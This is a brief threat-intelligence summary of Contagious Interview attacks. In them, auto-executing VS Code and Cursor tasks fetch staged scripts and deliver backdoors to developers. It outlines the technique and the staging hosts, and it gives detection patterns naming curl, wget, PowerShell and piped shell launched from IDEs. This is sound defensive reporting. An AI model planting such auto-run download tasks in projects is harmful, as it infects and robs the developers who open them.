Abstract Security tracks Contagious Interview infection chains that abuse VS Code and Cursor task auto-execution to run downloader commands when developer projects are opened. New variants stage scripts through GitHub Gists, short.gy URLs, Google Drive, Vercel, and custom domains, with examples masquerading as NVIDIA or Realtek-related software. The chains target developers, including cryptocurrency and DeFi-adjacent users, and deliver payloads that lead to WeaselStore backdoors or PyArmor-protected Python malware after staged Node.js, batch, and Python execution. Detection opportunities include monitoring IDE child processes that launch curl, wget, PowerShell, or piped shell execution, and inspecting tasks.json files for suspicious gist.githubusercontent.com or staging URLs.